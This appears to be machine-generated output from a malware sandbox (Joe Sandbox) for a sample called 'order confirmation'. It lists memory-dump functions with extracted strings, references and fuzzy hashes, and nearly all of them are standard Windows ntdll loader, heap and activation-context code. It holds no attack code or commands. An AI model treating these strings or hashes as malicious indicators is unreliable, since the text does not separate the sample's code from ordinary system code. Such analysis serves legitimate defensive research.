                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    • Opcode ID: 7d23bec877956fb481706d7d1c1441178fc45f7fafaff2d96181b137b659e37b
                                                    • Instruction ID: 27b665e1d9b9f34ae1d4941c2d268c0cadf7d4981a850cdfcd7d3074ba87b307
                                                    • Opcode Fuzzy Hash: 7d23bec877956fb481706d7d1c1441178fc45f7fafaff2d96181b137b659e37b
                                                    • Instruction Fuzzy Hash: 54026FF1D002399BDF31DB58CC84B9AB7B8AB54708F4041EAE609A7291DB709ED4CF59
                                                    Function 01458B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    • Opcode ID: baec316fa29c75c119aa5b52d44b720ab75ff7bb7a77389209d99c96e2e7ec74
                                                    • Instruction ID: 1511261d553be5c17755419a094c5ffe46701feae635e56c8f667f15dcef4c8a
                                                    • Opcode Fuzzy Hash: baec316fa29c75c119aa5b52d44b720ab75ff7bb7a77389209d99c96e2e7ec74
                                                    • Instruction Fuzzy Hash: CF51F2711143069BD326DF1E8844BABBBE8FF94244F14091EFE59C3262EB70D609C792
                                                    Function 013CAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                    • API String ID: 0-3197712848
                                                    • Opcode ID: 5637933f270f990d8c594581062d7c7df1d8908a79966922db887b7110128f74
                                                    • Instruction ID: 1ecab41bb530078674af6e2305b256365a5f523c9d5792b4606770266963e28c
                                                    • Opcode Fuzzy Hash: 5637933f270f990d8c594581062d7c7df1d8908a79966922db887b7110128f74
                                                    • Instruction Fuzzy Hash: 9012157160835A8BD321DF28C841BABBBE4BF84B58F45051EF9899B395E730DD44CB92
                                                    Function 01460274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 57093da51908d81df11aaeaa0210e04ba23896f2377dd0e531e55acd8252b015
                                                    • Instruction ID: b9d25775df8f3bec36b9a7d97ee2736350246d0534ea61ce727dd6b9cf81ecd5
                                                    • Opcode Fuzzy Hash: 57093da51908d81df11aaeaa0210e04ba23896f2377dd0e531e55acd8252b015
                                                    • Instruction Fuzzy Hash: 3DD1DD35600686DFDB22DF68C440AAEBFF5FF5A718F48805AF4499B362C7749981CB12
                                                    Function 014389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • VerifierDlls, xrefs: 01438CBD
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01438A67
                                                    • AVRF: -*- final list of providers -*- , xrefs: 01438B8F
                                                    • HandleTraces, xrefs: 01438C8F
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01438A3D
                                                    • VerifierDebug, xrefs: 01438CA5
                                                    • VerifierFlags, xrefs: 01438C50
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                    • API String ID: 0-3223716464
                                                    • Opcode ID: 06b0713ea4558d43f9779e339d29cb0dabc910cd7c035f13089db47fcdde97b7
                                                    • Instruction ID: 4ef9c033e6d10553ca3c7ed88ab886bd46799950fd81e3ed85a0d13d753d1bed
                                                    • Opcode Fuzzy Hash: 06b0713ea4558d43f9779e339d29cb0dabc910cd7c035f13089db47fcdde97b7
                                                    • Instruction Fuzzy Hash: 0A9116B26413039FD721EF6CD980B5BBBA4ABD8718F46061AFA406F371C7709C068B91
                                                    Function 013BEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    • API String ID: 0-1109411897
                                                    • Opcode ID: 92ff44d675065fabf1f874f909b17e0c5bff094cbdb8fc85e6aa2678acfdc6de
                                                    • Instruction ID: 5efa37172bf1abe091cb4e5d7861c21a6d8adf9ad7af6365781cd86d09062746
                                                    • Opcode Fuzzy Hash: 92ff44d675065fabf1f874f909b17e0c5bff094cbdb8fc85e6aa2678acfdc6de
                                                    • Instruction Fuzzy Hash: 8EA24F74A0562A8FDB64DF19CC887E9BBB5AF45308F1442EAD50DA7764EB349E81CF00
                                                    Function 013E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    • Opcode ID: 70adba60383f69168338aa6bf0f6c4fe64e78b19432e356e512c424e8f44889b
                                                    • Instruction ID: 1a96a10b67b10378efb5adae298eaf91ef77a47454da24aa39fbc36052c7b2c3
                                                    • Opcode Fuzzy Hash: 70adba60383f69168338aa6bf0f6c4fe64e78b19432e356e512c424e8f44889b
                                                    • Instruction Fuzzy Hash: C8915AB0B00335DBDB25DF19D849BAA7FA5EB61B18F99402EE5007B7E1D7709841CB90
                                                    Function 013A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01409A2A
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01409A01
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01409A11, 01409A3A
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014099ED
                                                    • LdrpInitShimEngine, xrefs: 014099F4, 01409A07, 01409A30
                                                    • apphelp.dll, xrefs: 013A6496
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-204845295
                                                    • Opcode ID: 23cd3a5b0006b4346a909401581be231108ff5601372824642448114884f899b
                                                    • Instruction ID: f3ce95a1a796978c52713f7b0ff641355b57eb6908cfc97eee77ea658be9b1cc
                                                    • Opcode Fuzzy Hash: 23cd3a5b0006b4346a909401581be231108ff5601372824642448114884f899b
                                                    • Instruction Fuzzy Hash: FE51E7712083459FE721DF29D841B6B7BE8FB84B4CF44452EF5899B2B1DA30E944CB92
                                                    Function 013E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() passed the empty activation context, xrefs: 01422165
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01422180
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01422178
                                                    • RtlGetAssemblyStorageRoot, xrefs: 01422160, 0142219A, 014221BA
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0142219F
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014221BF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    • Opcode ID: 28e6ad5365b485420920da9574c694a707e6e1dc3e035628bce248c9be5f0bdf
                                                    • Instruction ID: 5523fcaa874cd9d55230a0417abaf794f573fa0cd0227e9bd89247498ac59d93
                                                    • Opcode Fuzzy Hash: 28e6ad5365b485420920da9574c694a707e6e1dc3e035628bce248c9be5f0bdf
                                                    • Instruction Fuzzy Hash: 0B313936F4033577FB218A9A8C45F6B7BACDF64A58F05005AFA04BB291D2B09E41C6A1
                                                    Function 013EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • LdrpInitializeImportRedirection, xrefs: 01428177, 014281EB
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 013EC6C3
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01428181, 014281F5
                                                    • LdrpInitializeProcess, xrefs: 013EC6C4
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 014281E5
                                                    • Loading import redirection DLL: '%wZ', xrefs: 01428170
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: 4878e206c9a6863a90d6935ab4be170edd5bd13deb757a7148aea209bceaccc9
                                                    • Instruction ID: bc66af30df15fe2683c011b7f095ae17b9ccc6208e0521724b004746008db3e0
                                                    • Opcode Fuzzy Hash: 4878e206c9a6863a90d6935ab4be170edd5bd13deb757a7148aea209bceaccc9
                                                    • Instruction Fuzzy Hash: B531E4B26443569BD220EF2DD946E2BBBD4EF94B18F45051CF9446B3A1E620EC04CBA2
                                                    Function 013F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 013F2DF0: LdrInitializeThunk.NTDLL ref: 013F2DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D74
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    • Opcode ID: a0992bfbfb359efcf60fb34bad46d12f648b71532db5037840d4f369c02f02b0
                                                    • Instruction ID: 95064021abcbbb89d8f8d15a8c51d978bd46a1facedf6e485f249edd66e077aa
                                                    • Opcode Fuzzy Hash: a0992bfbfb359efcf60fb34bad46d12f648b71532db5037840d4f369c02f02b0
                                                    • Instruction Fuzzy Hash: 90424B71900715DFDB25CF28C880BAAB7F5BF04318F1445AEEA99AB352D770A984CF60
                                                    Function 013BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
                                                    • Instruction ID: 786604cfd91ef9c855d166213a8a5669a2d7753fcbfdd1baf2431fbf1c35e263
                                                    • Opcode Fuzzy Hash: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
                                                    • Instruction Fuzzy Hash: 7AC16A7410878ACFD711CF58C080BAAB7E4BB84708F04496AFA95DBB51F778CA49CB56
                                                    Function 013E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 013E8421
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E855E
                                                    • LdrpInitializeProcess, xrefs: 013E8422
                                                    • @, xrefs: 013E8591
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
                                                    • Instruction ID: fc50f15fddd6381689740081e8451f6f036be5922e6e8d3ca65fa3d17cf65974
                                                    • Opcode Fuzzy Hash: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
                                                    • Instruction Fuzzy Hash: 63919A71908355EFD721EF69CC44EABBAECFF84748F40096EFA8496190E734D9448B62
                                                    Function 013E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014222B6
                                                    • SXS: %s() passed the empty activation context, xrefs: 014221DE
                                                    • .Local, xrefs: 013E28D8
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014221D9, 014222B1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: df3f59899ccb3a98e7431aa002796383d482b48631fd557c83908f11199da31f
                                                    • Instruction ID: e1a0b6cd52d46b42af37f3dee4988a6be70eb31baf76a05147e1c3bfc334bb58
                                                    • Opcode Fuzzy Hash: df3f59899ccb3a98e7431aa002796383d482b48631fd557c83908f11199da31f
                                                    • Instruction Fuzzy Hash: 25A183319003399BDB25CF58D888B9AB7B5BF59358F1541EAE908A7391D7709EC0CF90
                                                    Function 013E4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0142342A
                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01423456
                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01423437
                                                    • RtlDeactivateActivationContext, xrefs: 01423425, 01423432, 01423451
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                    • API String ID: 0-1245972979
                                                    • Opcode ID: e9a23c7cf38289da24b5828a1f3a66991b8e2b30f7fadede8e4d53683da1bc63
                                                    • Instruction ID: 8ec844b213c402d6f55c366715105a7f6bbad33d8c810a2cf7499112c29e9413
                                                    • Opcode Fuzzy Hash: e9a23c7cf38289da24b5828a1f3a66991b8e2b30f7fadede8e4d53683da1bc63
                                                    • Instruction Fuzzy Hash: 756147326007229BDB22CF1DC845B2AB7E5BF88B18F54816EE955DB390D734E841CB91
                                                    Function 013B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01410FE5
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0141106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01411028
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014110AE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: 342be0647ee32254714f0a626f5b4ef8808e808631ea3cf529848c6968c6c717
                                                    • Instruction ID: b6854c4a416066802ad0b25e7b817aa1289030598e58b64493807b97f814f4b2
                                                    • Opcode Fuzzy Hash: 342be0647ee32254714f0a626f5b4ef8808e808631ea3cf529848c6968c6c717
                                                    • Instruction Fuzzy Hash: 5E71CFB1904305DFCB21DF19C8C5B977FA8AF94758F40046AFA488B697E335D588CB92
                                                    Function 013E4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142362F
                                                    • LdrpFindDllActivationContext, xrefs: 01423636, 01423662
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 0142365C
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01423640, 0142366C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 83d1850bb39e136143e39d972bc412a8f779e0a1ad8bc68513594669b4a7bb9b
                                                    • Instruction ID: 262d3a634e2cbc6245b7d0e49287569a6a14162499966488d552cf9627a1719b
                                                    • Opcode Fuzzy Hash: 83d1850bb39e136143e39d972bc412a8f779e0a1ad8bc68513594669b4a7bb9b
                                                    • Instruction Fuzzy Hash: 5F310B219003319ADF329A0CC84DB77BAF4BB4965CF46412AE604D76E3D7A6DC8087D5
                                                    Function 013D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0141A9A2
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0141A992
                                                    • LdrpDynamicShimModule, xrefs: 0141A998
                                                    • apphelp.dll, xrefs: 013D2462
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 5758deb5ef73c48e3c2e12a69cbc62979b0d78bbc7061bee813fb63d6aedfee4
                                                    • Instruction ID: f31e2a0ef6dd542db875b145ab37a9786803d8409e4e824e4c1efa6a6e8c1bb4
                                                    • Opcode Fuzzy Hash: 5758deb5ef73c48e3c2e12a69cbc62979b0d78bbc7061bee813fb63d6aedfee4
                                                    • Instruction Fuzzy Hash: DF315B76601241ABDB319F5DD881E6BBFB9FB84B04F67401EE9016B379D7705881CB80
                                                    Function 013C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 013C3255
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013C327D
                                                    • HEAP: , xrefs: 013C3264
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    • Opcode ID: a97a6c0826c7ffa29b4f9e4306a10c86ca385878313a96e1d1e4024e558109b5
                                                    • Instruction ID: 76ed8596c1c6a6249a69e2b9db95741bc66af172ca1487e14d3896f5845acf40
                                                    • Opcode Fuzzy Hash: a97a6c0826c7ffa29b4f9e4306a10c86ca385878313a96e1d1e4024e558109b5
                                                    • Instruction Fuzzy Hash: 8E92B971A042499FEB25CF68C4407AEBBF1FF48B18F18806DE84AAB691D735AD45CF50
                                                    Function 013C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 5fdf76fb31e97de2e2054c54231651551cdf19dd5bc9bca15b17a7828d1fa05a
                                                    • Instruction ID: 93f0bb6ac985914c74a6b6fae4ffb67b9339df73bd9e5a15c8d7f02e6c9aed8e
                                                    • Opcode Fuzzy Hash: 5fdf76fb31e97de2e2054c54231651551cdf19dd5bc9bca15b17a7828d1fa05a
                                                    • Instruction Fuzzy Hash: 43F1BE35A00646DFEB19CF68C880BAABBB5FB85708F14816DE4169B765D730ED81CF90
                                                    Function 013D6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $@
                                                    • API String ID: 0-1077428164
                                                    • Opcode ID: 4fd45fca6b7739d655b60f08f9b061adb2e0bc8748e31a555b3c8dffa6d063bf
                                                    • Instruction ID: 086f95248a21ce0e65c144c5642ceecadf01afd5ac3f049778401ea7649d0f99
                                                    • Opcode Fuzzy Hash: 4fd45fca6b7739d655b60f08f9b061adb2e0bc8748e31a555b3c8dffa6d063bf
                                                    • Instruction Fuzzy Hash: 8BC2B2726083459FDB25CF28D881BABBBE5BF88718F04892EF999C7251D734D805CB52
                                                    Function 013AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                    • API String ID: 0-2779062949
                                                    • Opcode ID: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
                                                    • Instruction ID: 5771c9fc42a61e4189008d2b1536b4daba44001371faf4aa269bca735bcbec6d
                                                    • Opcode Fuzzy Hash: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
                                                    • Instruction Fuzzy Hash: 2AA15F72911629DBDB32DF69CC88BAAB7B8FF44704F1141EAE908A7250D7359E84CF50
